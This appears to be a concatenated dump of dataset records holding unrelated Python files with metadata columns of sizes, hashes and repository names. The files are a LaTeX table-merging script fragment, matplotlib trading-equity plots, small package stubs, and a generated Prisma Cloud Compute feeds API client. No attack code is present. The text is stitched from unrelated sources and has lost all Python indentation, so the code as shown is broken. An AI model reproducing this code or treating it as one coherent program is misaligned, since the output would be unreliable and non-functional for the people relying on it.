content_min_discm = f1.readlines()
with open("test_accuracy_for_min_parity.tex", "r") as f2:
content_max_accuracy = f2.readlines()
with open("min-parity-diff_fulltest.tex", "r") as f3:
content_parity = f3.readlines()
if scientific_notation:
write_file = "min-parity-model_scientific.tex"
else:
write_file = "min-parity-model_floating.tex"
if os.path.exists(f"{write_file}"):
os.system(f"rm {write_file}")
for id_, (l1, l2, l3) in enumerate(zip(content_min_discm, content_max_accuracy, content_parity)):
l1 = l1.replace(" \\\\ \n", "") # remove the breaklines
l1 = l1.replace(" \\\\ \\midrule\n", "")
l1 = l1.replace("\\\\", "") # remove the breaklines, for the last average line
l2 = l2.replace(" \\\\ \n", "") # new
l2 = l2.replace(" \\\\ \\midrule\n", "")
l2 = l2.replace("\\\\", "")
if "midrule" in l1:
assert "midrule" in l2 and "midrule" in l3
mix = '\\midrule\n'
else:
# l1 = l1.split("&")
experiment1 = l1.split("&")[0].strip()
try:
l1 = l1[l1.index("&"):] # remove experiment ID
except:
import ipdb; ipdb.set_trace()
# l2 = l2.split("&")
experiment2 = l2.split("&")[0].strip()
l2 = l2[l2.index("&"):] # remove experiment ID
experiment3 = l3.split("&")[0].strip() # new
l3 = l3[l3.index("&"):]
try:
assert(experiment1 == experiment2 == experiment3)
except:
import ipdb; ipdb.set_trace()
mix = experiment1 + " " + l1 + l2 + l3 # this already has the breaklines
# print(mix)
with open(write_file, "a") as f3:
print(mix, end="", file=f3)
if __name__ == "__main__":
for i in [True, False]:
min_discm_mix(i)
for i in [True, False]:
max_accuracy_mix(i)
for i in [True, False]:
min_parity_mix(i)
| 34.212435
| 101
| 0.529759
| 776
| 6,603
| 4.351804
| 0.104381
| 0.021321
| 0.029316
| 0.040865
| 0.948475
| 0.923601
| 0.890435
| 0.859046
| 0.859046
| 0.859046
| 0
| 0.038589
| 0.317129
| 6,603
| 193
| 102
| 34.212435
| 0.710357
| 0.092079
| 0
| 0.818182
| 0
| 0
| 0.160101
| 0.092372
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.020979
| false
| 0
| 0.048951
| 0
| 0.06993
| 0.041958
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bef9d3b7e06ff1065b8cec7b0f33e0fc00081e1e
| 2,528
|
py
|
Python
|
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | 3
|
2017-10-28T14:50:18.000Z
|
2017-11-12T13:35:05.000Z
|
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | null | null | null |
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | 2
|
2017-10-28T14:51:46.000Z
|
2018-08-05T10:36:38.000Z
|
from matplotlib.dates import YearLocator, MonthLocator, DateFormatter
import datetime
import matplotlib.pyplot as plt
import numpy as np
def plotequity_pred(pred, res, title, dataformat="%Y-%m-%d"):
mydpi = 96
plt.close("all")
pos = np.where( pred > 0, 1, np.where( pred <-0, -1, 0 ) )
eq = np.cumsum( pos * res )
fig = plt.figure(figsize=(1800 / mydpi, 1000 / mydpi), dpi=mydpi)
ax = fig.add_subplot(111)
ax.autoscale_view()
print(res.head())
years = YearLocator() # every year
months = MonthLocator() # every month
yearsFmt = DateFormatter('%Y')
ax.xaxis.set_major_locator(years)
ax.xaxis.set_major_formatter(yearsFmt)
ax.xaxis.set_minor_locator(months)
datemin =datetime.date(datetime.datetime.strptime(res.index.min(), dataformat ).year, 1, 1)
datemax =datetime.date(datetime.datetime.strptime(res.index.max(), dataformat ).year+1, 1, 1)
ax.set_xlim( datemin, datemax)
ax.fmt_xdata = DateFormatter('%Y-%m-%d')
ax.plot( res.index, eq.values, color= "green" )
ax.plot( res.index, np.cumsum(res).values, color="black" )
fig.autofmt_xdate()
plt.title(title)
plt.show()
def plotequity_trades( trades, res = None, title="Title", dataformat="%Y-%m-%d"):
mydpi = 96
plt.close("all")
eq = np.cumsum( trades )
fig = plt.figure(figsize=(1800 / mydpi, 1000 / mydpi), dpi=mydpi)
ax = fig.add_subplot(111)
ax.autoscale_view()
years = YearLocator() # every year
months = MonthLocator() # every month
yearsFmt = DateFormatter('%Y')
ax.xaxis.set_major_locator(years)
ax.xaxis.set_major_formatter(yearsFmt)
ax.xaxis.set_minor_locator(months)
datemin =datetime.date(datetime.datetime.strptime(res.index.min(), dataformat ).year, 1, 1)
datemax =datetime.date(datetime.datetime.strptime(res.index.max(), dataformat ).year+1, 1, 1)
ax.set_xlim( datemin, datemax)
ax.fmt_xdata = DateFormatter('%Y-%m-%d')
ax.plot( trades.index, eq.values, color= "green" )
if res is not None:
ax.plot( res.index, np.cumsum(res).values, color="black" )
fig.autofmt_xdate()
plt.title(title)
plt.show()
def plotequity_pl( trades, title="Title" ):
mydpi = 96
plt.close("all")
fig = plt.figure(figsize=(1800 / mydpi, 1000 / mydpi), dpi=mydpi)
ax = fig.add_subplot(111)
ax.autoscale_view()
for x in trades:
eq = np.cumsum( x )
ax.plot( range(0,eq.shape[0]), eq, color= "green" )
plt.title(title)
plt.show()
| 30.829268
| 97
| 0.651108
| 355
| 2,528
| 4.560563
| 0.24507
| 0.034589
| 0.03706
| 0.03706
| 0.809141
| 0.741198
| 0.741198
| 0.741198
| 0.741198
| 0.741198
| 0
| 0.027573
| 0.196598
| 2,528
| 82
| 98
| 30.829268
| 0.769572
| 0.017801
| 0
| 0.725806
| 0
| 0
| 0.032271
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0
| 0.064516
| 0
| 0.112903
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8339cee41f31c8370b1be36cd34369a947fce05d
| 69
|
py
|
Python
|
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
from .opencv_image import *
from .image import *
from .draw import *
| 17.25
| 27
| 0.73913
| 10
| 69
| 5
| 0.5
| 0.44
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 28
| 23
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3603cd26868e12093e1d6f88d01d546328685a69
| 140
|
py
|
Python
|
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | null | null | null |
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | null | null | null |
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | 1
|
2020-02-15T12:16:21.000Z
|
2020-02-15T12:16:21.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
def setup_construct_menu():
'''Setup Construct Action menu'''
pass
| 17.5
| 38
| 0.685714
| 17
| 140
| 5.235294
| 0.764706
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008772
| 0.185714
| 140
| 7
| 39
| 20
| 0.77193
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
3629e761fb241df6774d351cc8cb855d2680577b
| 80,711
|
py
|
Python
|
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class FeedsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_v1_feeds_bundle_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_bundle_get # noqa: E501
DownloadFeedsBundle creates and serves the intelligence feeds bundle # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_bundle_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_bundle_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_bundle_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_bundle_get # noqa: E501
DownloadFeedsBundle creates and serves the intelligence feeds bundle # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_bundle_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_bundle_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/bundle', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_bundle_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_bundle_put # noqa: E501
UploadOfflineIntelligenceFeeds uploads the offline intelligence feeds bundle # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_bundle_put(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_bundle_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_bundle_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_bundle_put # noqa: E501
UploadOfflineIntelligenceFeeds uploads the offline intelligence feeds bundle # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_bundle_put_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_bundle_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/bundle', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_digest_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_digest_get # noqa: E501
CustomVulnerabilitiesDigest returns the custom vulnerabilities feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_digest_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: str
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_digest_get # noqa: E501
CustomVulnerabilitiesDigest returns the custom vulnerabilities feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_custom_vulnerabilities_digest_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "str",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/custom-vulnerabilities/digest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_get # noqa: E501
CustomVulnerabilities returns the custom vulnerabilities feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: VulnCustomVulnerabilities
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_get # noqa: E501
CustomVulnerabilities returns the custom vulnerabilities feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(VulnCustomVulnerabilities, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_custom_vulnerabilities_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "VulnCustomVulnerabilities",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/custom-vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_put # noqa: E501
SetCustomVulnerabilities sets the custom vulnerabilities feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_put(async_req=True)
>>> result = thread.get()
:param vuln_custom_vulnerabilities:
:type vuln_custom_vulnerabilities: VulnCustomVulnerabilities
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_custom_vulnerabilities_put # noqa: E501
SetCustomVulnerabilities sets the custom vulnerabilities feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(async_req=True)
>>> result = thread.get()
:param vuln_custom_vulnerabilities:
:type vuln_custom_vulnerabilities: VulnCustomVulnerabilities
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'vuln_custom_vulnerabilities'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_custom_vulnerabilities_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'vuln_custom_vulnerabilities' in local_var_params:
body_params = local_var_params['vuln_custom_vulnerabilities']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/custom/custom-vulnerabilities', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_digest_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_digest_get # noqa: E501
CVEAllowListDigest returns the CVE allow list digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_digest_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: str
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_digest_get # noqa: E501
CVEAllowListDigest returns the CVE allow list digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_cve_allow_list_digest_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "str",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/cve-allow-list/digest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_get # noqa: E501
CVEAllowList returns the list of allowed CVEs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SharedCVEAllowList
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_cve_allow_list_get_with_http_info(**kwargs) # noqa: E501
